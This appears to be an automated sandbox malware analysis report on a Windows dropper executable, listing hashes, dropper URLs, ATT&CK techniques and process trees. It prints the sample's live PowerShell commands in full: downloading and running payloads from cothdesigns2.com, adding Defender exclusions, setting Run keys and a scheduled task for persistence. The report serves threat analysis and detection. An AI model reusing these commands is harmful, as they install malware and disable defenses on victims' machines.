c4ac79bf17fc00f26e2acdeeb0466da96ed9b928df1dd99b8c865a872bb2143d

General

Target

d26c5ebd1d7fb1d5b8f8ef313d408b3a.exe
Size

43KB
MD5

d26c5ebd1d7fb1d5b8f8ef313d408b3a
SHA1

1a2386f8d8e5f64eaf404e74c97ed94dc50627c7
SHA256

c4ac79bf17fc00f26e2acdeeb0466da96ed9b928df1dd99b8c865a872bb2143d
SHA512

dcdb0c5b3128379974ed1604d9196a486c7610867a29b6d985e9baf37485eb96397ce96ff8bd15490e93d6135afa5ca17136bfaa25892a17d4919fded8897fc9
SSDEEP

768:Z84x3tuZYVP1stOVTBdlDR0YIWEj+JtrU0bLekwijxBY1SVvKnxKcS8bgGbaG6gk:Vx3VVVzd7Ej+7tbLek7jxG1SVSnccS8a

Score

10^/10

persistence

Malware Config

Extracted

Language

ps1

Source

URLs

exe.dropper

http://cothdesigns2.com:443/obieznne.msi

Extracted

Language

ps1

Source

URLs

exe.dropper

http://cothdesigns2.com:443/H2022_Tool.msi

Extracted

Language

ps1

Source

URLs

exe.dropper

http://cothdesigns2.com:443/cmd.msi

exe.dropper

http://cothdesigns2.com:443/xmlo.msi

Signatures

Adds policy Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\GoogleUpdateTask = "C:\\ProgramData\\Google\\software_reporter_tool.exe"	reg.exe

Blocklisted process makes network request 4 IoCs

flow	pid	Process
15	3388	powershell.exe
17	500	powershell.exe
18	1884	powershell.exe
46	3388	powershell.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation	d26c5ebd1d7fb1d5b8f8ef313d408b3a.exe

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\GoogleUpdateTask = "C:\\ProgramData\\Google\\software_reporter_tool.exe"	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run	reg.exe

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
10	ip-api.com

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Creates scheduled task(s) 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task

T1053

pid	Process
4012	schtasks.exe

Modifies registry key 1 TTPs 2 IoCs

Modify Registry

T1112

pid	Process
360	reg.exe
3636	reg.exe

Suspicious behavior: EnumeratesProcesses 23 IoCs

pid	Process
2180	d26c5ebd1d7fb1d5b8f8ef313d408b3a.exe
2180	d26c5ebd1d7fb1d5b8f8ef313d408b3a.exe
2180	d26c5ebd1d7fb1d5b8f8ef313d408b3a.exe
2180	d26c5ebd1d7fb1d5b8f8ef313d408b3a.exe
5008	powershell.exe
2180	d26c5ebd1d7fb1d5b8f8ef313d408b3a.exe
3068	powershell.exe
500	powershell.exe
4264	powershell.exe
4264	powershell.exe
3388	powershell.exe
3388	powershell.exe
500	powershell.exe
500	powershell.exe
1884	powershell.exe
1884	powershell.exe
3388	powershell.exe
5008	powershell.exe
5008	powershell.exe
3068	powershell.exe
3068	powershell.exe
4264	powershell.exe
1884	powershell.exe

Suspicious use of AdjustPrivilegeToken 7 IoCs

description	pid	Process
Token: SeDebugPrivilege	2180	d26c5ebd1d7fb1d5b8f8ef313d408b3a.exe
Token: SeDebugPrivilege	5008	powershell.exe
Token: SeDebugPrivilege	3068	powershell.exe
Token: SeDebugPrivilege	500	powershell.exe
Token: SeDebugPrivilege	4264	powershell.exe
Token: SeDebugPrivilege	3388	powershell.exe
Token: SeDebugPrivilege	1884	powershell.exe

Suspicious use of WriteProcessMemory 26 IoCs

description	pid	Process	procid_target
PID 5008 wrote to memory of 2112	5008	powershell.exe	96
PID 5008 wrote to memory of 2112	5008	powershell.exe	96
PID 2180 wrote to memory of 2772	2180	d26c5ebd1d7fb1d5b8f8ef313d408b3a.exe	97
PID 2180 wrote to memory of 2772	2180	d26c5ebd1d7fb1d5b8f8ef313d408b3a.exe	97
PID 4264 wrote to memory of 2344	4264	powershell.exe	99
PID 4264 wrote to memory of 2344	4264	powershell.exe	99
PID 2112 wrote to memory of 2444	2112	cmd.exe	100
PID 2112 wrote to memory of 2444	2112	cmd.exe	100
PID 2344 wrote to memory of 360	2344	cmd.exe	101
PID 2344 wrote to memory of 360	2344	cmd.exe	101
PID 4264 wrote to memory of 2196	4264	powershell.exe	102
PID 4264 wrote to memory of 2196	4264	powershell.exe	102
PID 2196 wrote to memory of 3636	2196	cmd.exe	103
PID 2196 wrote to memory of 3636	2196	cmd.exe	103
PID 2772 wrote to memory of 3356	2772	cmd.exe	104
PID 2772 wrote to memory of 3356	2772	cmd.exe	104
PID 5008 wrote to memory of 1404	5008	powershell.exe	105
PID 5008 wrote to memory of 1404	5008	powershell.exe	105
PID 1404 wrote to memory of 1260	1404	cmd.exe	106
PID 1404 wrote to memory of 1260	1404	cmd.exe	106
PID 3388 wrote to memory of 1812	3388	powershell.exe	115
PID 3388 wrote to memory of 1812	3388	powershell.exe	115
PID 1812 wrote to memory of 4012	1812	cmd.exe	116
PID 1812 wrote to memory of 4012	1812	cmd.exe	116
PID 3388 wrote to memory of 3348	3388	powershell.exe	117
PID 3388 wrote to memory of 3348	3388	powershell.exe	117

C:\Users\Admin\AppData\Local\Temp\d26c5ebd1d7fb1d5b8f8ef313d408b3a.exe
"C:\Users\Admin\AppData\Local\Temp\d26c5ebd1d7fb1d5b8f8ef313d408b3a.exe"
1⤵
- Checks computer location settings
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2180
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\d26c5ebd1d7fb1d5b8f8ef313d408b3a.exe"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2772
- - C:\Windows\system32\choice.exe
    choice /C Y /N /D Y /T 3
    3⤵
    PID:3356

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" cmd.exe /c netsh interface ipv4 set dns name=Ethernet static 8.8.8.8;cmd.exe /c netsh interface ipv4 add dns name=Ethernet 8.8.4.4 index=2
1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:5008
- C:\Windows\system32\cmd.exe
  "C:\Windows\system32\cmd.exe" /c netsh interface ipv4 set dns name=Ethernet static 8.8.8.8
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2112
- - C:\Windows\system32\netsh.exe
    netsh interface ipv4 set dns name=Ethernet static 8.8.8.8
    3⤵
    PID:2444
- C:\Windows\system32\cmd.exe
  "C:\Windows\system32\cmd.exe" /c netsh interface ipv4 add dns name=Ethernet 8.8.4.4 index=2
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1404
- - C:\Windows\system32\netsh.exe
    netsh interface ipv4 add dns name=Ethernet 8.8.4.4 index=2
    3⤵
    PID:1260

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath 'C:\Windows\Temp';Add-MpPreference -ExclusionPath 'C:\ProgramData\Google\software_reporter_tool.exe';Add-MpPreference -ExclusionProcess 'InstallUtil.exe';Add-MpPreference -ExclusionProcess 'software_reporter_tool.exe';Add-MpPreference -ExclusionProcess 'svchost.exe';Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE';Add-MpPreference -ExclusionPath 'C:\ProgramData\Google\GoogleUpdate.exe';Add-MpPreference -ExclusionProcess 'powershell.exe';Add-MpPreference -ExclusionProcess 'cmd.exe';Add-MpPreference -ExclusionProcess 'GoogleUpdate.exe'
1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3068

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" (New-Object System.Net.WebClient).DownloadFile('http://cothdesigns2.com:443/obieznne.msi','C:\ProgramData\Google\software_reporter_tool.exe');C:\ProgramData\Google\software_reporter_tool.exe
1⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:500

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" cmd.exe /c reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTask" /t REG_SZ /f /d "C:\ProgramData\Google\software_reporter_tool.exe";cmd.exe /c reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run" /v "GoogleUpdateTask" /t REG_SZ /f /d "C:\ProgramData\Google\software_reporter_tool.exe"
1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4264
- C:\Windows\system32\cmd.exe
  "C:\Windows\system32\cmd.exe" /c reg add HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v GoogleUpdateTask /t REG_SZ /f /d C:\ProgramData\Google\software_reporter_tool.exe
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2344
- - C:\Windows\system32\reg.exe
    reg add HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v GoogleUpdateTask /t REG_SZ /f /d C:\ProgramData\Google\software_reporter_tool.exe
    3⤵
    - Adds Run key to start application
    - Modifies registry key
    PID:360
- C:\Windows\system32\cmd.exe
  "C:\Windows\system32\cmd.exe" /c reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run /v GoogleUpdateTask /t REG_SZ /f /d C:\ProgramData\Google\software_reporter_tool.exe
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2196
- - C:\Windows\system32\reg.exe
    reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run /v GoogleUpdateTask /t REG_SZ /f /d C:\ProgramData\Google\software_reporter_tool.exe
    3⤵
    - Adds policy Run key to start application
    - Modifies registry key
    PID:3636

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" (New-Object System.Net.WebClient).DownloadFile('http://cothdesigns2.com:443/H2022_Tool.msi','C:\Windows\Temp\H2022_Tool.exe');C:\Windows\Temp\H2022_Tool.exe
1⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1884

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" (New-Object System.Net.WebClient).DownloadFile('http://cothdesigns2.com:443/cmd.msi','C:\ProgramData\Google\GoogleUpdate.exe');(New-Object System.Net.WebClient).DownloadFile('http://cothdesigns2.com:443/xmlo.msi','C:\Windows\Temp\.xml');cmd.exe /c schtasks /create /xml "C:\Windows\Temp\.xml" /tn "GoogleUpdateTask";cmd.exe /c del "C:\Windows\Temp\.xml"
1⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3388
- C:\Windows\system32\cmd.exe
  "C:\Windows\system32\cmd.exe" /c schtasks /create /xml C:\Windows\Temp\.xml /tn GoogleUpdateTask
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1812
- - C:\Windows\system32\schtasks.exe
    schtasks /create /xml C:\Windows\Temp\.xml /tn GoogleUpdateTask
    3⤵
    - Creates scheduled task(s)
    PID:4012
- C:\Windows\system32\cmd.exe
  "C:\Windows\system32\cmd.exe" /c del C:\Windows\Temp\.xml
  2⤵
  PID:3348

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Scheduled Task

1

T1053

Persistence

Registry Run Keys / Startup Folder

Scheduled Task

Privilege Escalation

Scheduled Task

1

T1053

Defense Evasion

Modify Registry

3

T1112

Credential Access

Discovery

Query Registry

1

T1012

System Information Discovery

2

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
d85ba6ff808d9e5444a4b369f5bc2730

SHA1
31aa9d96590fff6981b315e0b391b575e4c0804a

SHA256
84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

SHA512
8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
64B

MD5
7ff9440dc25523a288d278b38add13a1

SHA1
d67faf5afe85cacd9d816349f17ded3686ecf1a7

SHA256
ac518124d3bd39440bfba66739f8fab57ff82ea778f707ea2c902b29efde0ee0

SHA512
7116fcf6760a69efebfbffeba5abcfef903cc8647e142117023e022bb34c5fe6d1a35c727faab1e6d6505b2bd69689cf52f8ecef5253ca12d99d425021799911

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
64B

MD5
5caad758326454b5788ec35315c4c304

SHA1
3aef8dba8042662a7fcf97e51047dc636b4d4724

SHA256
83e613b6dc8d70e3bb67c58535e014f58f3e8b2921e93b55137d799fc8c56391

SHA512
4e0d443cf81e2f49829b0a458a08294bf1bdc0e38d3a938fb8274eeb637d9a688b14c7999dd6b86a31fcec839a9e8c1a9611ed0bbae8bd59caa9dba1e8253693

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
abc27673d9c940ad74b41c58391d2412

SHA1
9a31a521a521dcd0f974ce6f7a50aecc69a50df0

SHA256
cb3f2adb2f5e39fbe5ae3c49837d9074a85f21e9be7eb8404444611f78a08357

SHA512
c7a574f9a53d29e2212500eb48fb05f475bac1e21b858f58e0e441caabea760ba7b7425a98610bf91e66d662f70a91c210b522bbecad3f5180e1aedbf6cfcdc4

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
abc27673d9c940ad74b41c58391d2412

SHA1
9a31a521a521dcd0f974ce6f7a50aecc69a50df0

SHA256
cb3f2adb2f5e39fbe5ae3c49837d9074a85f21e9be7eb8404444611f78a08357

SHA512
c7a574f9a53d29e2212500eb48fb05f475bac1e21b858f58e0e441caabea760ba7b7425a98610bf91e66d662f70a91c210b522bbecad3f5180e1aedbf6cfcdc4

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
aa8efa56e1e40374bbd21e0e469dceb7

SHA1
33a592799d4898c6efdd29e132f2f76ec51dbc08

SHA256
25eb4f899ae8f90b66b9342781456700d1af487f6f302fe5a727328b026f6bdf

SHA512
ad6de575b83db36b239317e4c46a1eaeb0383d5909a12b69ee2b38798c2b5cb0d19b464f5689037501d20592d92c4d3d84f0e49fdb1c0648b6593481a183f096

Download Submit
memory/360-146-0x0000000000000000-mapping.dmp

Download
memory/500-138-0x00007FFA66FE0000-0x00007FFA67AA1000-memory.dmp

Filesize
10.8MB

Download
memory/500-162-0x00007FFA66FE0000-0x00007FFA67AA1000-memory.dmp

Filesize
10.8MB

Download
memory/500-159-0x00007FFA66FE0000-0x00007FFA67AA1000-memory.dmp

Filesize
10.8MB

Download
memory/1260-155-0x0000000000000000-mapping.dmp

Download
memory/1404-154-0x0000000000000000-mapping.dmp

Download
memory/1812-165-0x0000000000000000-mapping.dmp

Download
memory/1884-158-0x00007FFA66FE0000-0x00007FFA67AA1000-memory.dmp

Filesize
10.8MB

Download
memory/1884-144-0x00007FFA66FE0000-0x00007FFA67AA1000-memory.dmp

Filesize
10.8MB

Download
memory/1884-164-0x00007FFA66FE0000-0x00007FFA67AA1000-memory.dmp

Filesize
10.8MB

Download
memory/2112-137-0x0000000000000000-mapping.dmp

Download
memory/2180-143-0x00007FFA66FE0000-0x00007FFA67AA1000-memory.dmp

Filesize
10.8MB

Download
memory/2180-132-0x000001EA5C650000-0x000001EA5C660000-memory.dmp

Filesize
64KB

Download
memory/2180-133-0x00007FFA66FE0000-0x00007FFA67AA1000-memory.dmp

Filesize
10.8MB

Download
memory/2196-147-0x0000000000000000-mapping.dmp

Download
memory/2344-142-0x0000000000000000-mapping.dmp

Download
memory/2444-145-0x0000000000000000-mapping.dmp

Download
memory/2772-140-0x0000000000000000-mapping.dmp

Download
memory/3068-150-0x00007FFA66FE0000-0x00007FFA67AA1000-memory.dmp

Filesize
10.8MB

Download
memory/3068-136-0x00007FFA66FE0000-0x00007FFA67AA1000-memory.dmp

Filesize
10.8MB

Download
memory/3348-167-0x0000000000000000-mapping.dmp

Download
memory/3356-149-0x0000000000000000-mapping.dmp

Download
memory/3388-141-0x00007FFA66FE0000-0x00007FFA67AA1000-memory.dmp

Filesize
10.8MB

Download
memory/3388-160-0x00007FFA66FE0000-0x00007FFA67AA1000-memory.dmp

Filesize
10.8MB

Download
memory/3388-169-0x00007FFA66FE0000-0x00007FFA67AA1000-memory.dmp

Filesize
10.8MB

Download
memory/3636-148-0x0000000000000000-mapping.dmp

Download
memory/4012-166-0x0000000000000000-mapping.dmp

Download
memory/4264-139-0x00007FFA66FE0000-0x00007FFA67AA1000-memory.dmp

Filesize
10.8MB

Download
memory/4264-153-0x00007FFA66FE0000-0x00007FFA67AA1000-memory.dmp

Filesize
10.8MB

Download
memory/5008-157-0x00007FFA66FE0000-0x00007FFA67AA1000-memory.dmp

Filesize
10.8MB

Download
memory/5008-135-0x00007FFA66FE0000-0x00007FFA67AA1000-memory.dmp

Filesize
10.8MB

Download
memory/5008-134-0x00000216501B0000-0x00000216501D2000-memory.dmp

Filesize
136KB

Download

Analysis

Sharing

General

Malware Config

Extracted

Extracted

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads